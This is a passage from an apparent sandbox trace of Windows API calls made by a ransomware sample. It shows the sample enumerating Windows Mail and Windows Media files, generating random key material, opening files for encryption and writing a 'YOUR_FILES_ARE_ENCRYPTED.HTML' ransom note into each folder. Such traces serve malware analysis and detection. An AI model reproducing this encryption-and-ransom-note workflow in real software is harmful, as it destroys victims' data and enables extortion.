lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x42016184, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shades of Blue.htm", cAlternateFileName="SHADES~1.HTM")) returned 1 [0170.775] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0170.775] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.775] PathFindExtensionW (pszPath="Shades of Blue.htm") returned=".htm" [0170.775] lstrlenW (lpString=".htm") returned 4 [0170.775] PathFindExtensionW (pszPath="Shades of Blue.htm") returned=".htm" [0170.775] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0170.776] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0170.776] CloseHandle (hObject=0x5b4) returned 1 [0170.776] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcafee00, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcafee00, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82949f3c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShadesOfBlue.jpg", cAlternateFileName="SHADES~1.JPG")) returned 1 [0170.776] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0170.776] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.776] PathFindExtensionW (pszPath="ShadesOfBlue.jpg") returned=".jpg" [0170.776] lstrlenW (lpString=".jpg") returned 4 [0170.776] PathFindExtensionW (pszPath="ShadesOfBlue.jpg") returned=".jpg" [0170.776] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0170.777] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4734) returned 1 [0170.777] GetProcessHeap () returned 0x270000 [0170.777] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7821160 [0170.781] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FB") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="00") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="FF") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="4D") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="1B") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="B6") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="C9") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="6F") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="95") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="69") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="AE") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="DA") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="1C") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="6A") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="B0") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="D0") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="05") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="FC") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="C4") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="03") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="34") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="16") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="FA") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="C3") returned 2 [0170.781] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="7A") returned 2 [0170.782] lstrcpyW (in: lpString1=0x7831214, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" [0170.782] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x7821160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.782] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7821160, lpOverlapped=0x7821160) returned 1 [0170.782] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x42062444, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Soft Blue.htm", cAlternateFileName="SOFTBL~1.HTM")) returned 1 [0170.782] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0170.782] lstrcmpW (lpString1="Soft Blue.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.783] PathFindExtensionW (pszPath="Soft Blue.htm") returned=".htm" [0170.783] lstrlenW (lpString=".htm") returned 4 [0170.783] PathFindExtensionW (pszPath="Soft Blue.htm") returned=".htm" [0170.783] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f4 [0170.783] GetFileSizeEx (in: hFile=0x5f4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=232) returned 1 [0170.783] CloseHandle (hObject=0x5f4) returned 1 [0170.783] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829961fc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0170.783] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0170.784] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.784] PathFindExtensionW (pszPath="SoftBlue.jpg") returned=".jpg" [0170.784] lstrlenW (lpString=".jpg") returned 4 [0170.784] PathFindExtensionW (pszPath="SoftBlue.jpg") returned=".jpg" [0170.784] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f4 [0170.784] GetFileSizeEx (in: hFile=0x5f4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=10569) returned 1 [0170.784] GetProcessHeap () returned 0x270000 [0170.784] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78492b8 [0170.790] lstrcpyW (in: lpString1=0x785936c, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" [0170.790] CreateIoCompletionPort (FileHandle=0x5f4, ExistingCompletionPort=0x3a0, CompletionKey=0x78492b8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.790] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78492b8, lpOverlapped=0x78492b8) returned 1 [0170.790] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x420ae704, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0170.790] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0170.790] lstrcmpW (lpString1="Stars.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.790] PathFindExtensionW (pszPath="Stars.htm") returned=".htm" [0170.790] lstrlenW (lpString=".htm") returned 4 [0170.790] PathFindExtensionW (pszPath="Stars.htm") returned=".htm" [0170.790] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f0 [0170.791] GetFileSizeEx (in: hFile=0x5f0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=230) returned 1 [0170.791] CloseHandle (hObject=0x5f0) returned 1 [0170.791] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829bc35c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0170.791] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0170.791] lstrcmpW (lpString1="Stars.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.791] PathFindExtensionW (pszPath="Stars.jpg") returned=".jpg" [0170.791] lstrlenW (lpString=".jpg") returned 4 [0170.791] PathFindExtensionW (pszPath="Stars.jpg") returned=".jpg" [0170.791] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f0 [0170.792] GetFileSizeEx (in: hFile=0x5f0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=7505) returned 1 [0170.792] GetProcessHeap () returned 0x270000 [0170.792] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7871410 [0170.796] lstrcpyW (in: lpString1=0x78814c4, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" [0170.796] CreateIoCompletionPort (FileHandle=0x5f0, ExistingCompletionPort=0x3a0, CompletionKey=0x7871410, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.796] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7871410, lpOverlapped=0x7871410) returned 1 [0170.797] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x829bc35c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 0 [0170.797] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.797] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0170.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0170.797] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.800] CloseHandle (hObject=0x5b8) returned 1 [0170.800] GetProcessHeap () returned 0x270000 [0170.800] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0170.801] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb44be8bb, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0170.801] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0170.801] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.801] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0170.969] lstrlenW (lpString=".MSMessageStore") returned 15 [0170.969] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0170.969] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82b249d4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0170.969] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0170.969] lstrcmpW (lpString1="WindowsMail.pat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.969] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0170.969] lstrlenW (lpString=".pat") returned 4 [0170.969] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0170.969] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82b249d4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0170.969] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.969] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0170.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.970] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.973] CloseHandle (hObject=0x5fc) returned 1 [0170.973] GetProcessHeap () returned 0x270000 [0170.974] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.985] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0170.986] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media") returned 58 [0170.986] GetProcessHeap () returned 0x270000 [0170.986] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.988] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media" [0170.988] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*" [0170.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.989] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.989] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="12.0", cAlternateFileName="")) returned 1 [0170.989] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned 63 [0170.989] GetProcessHeap () returned 0x270000 [0170.989] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.990] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0" [0170.990] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*" [0170.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.990] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", 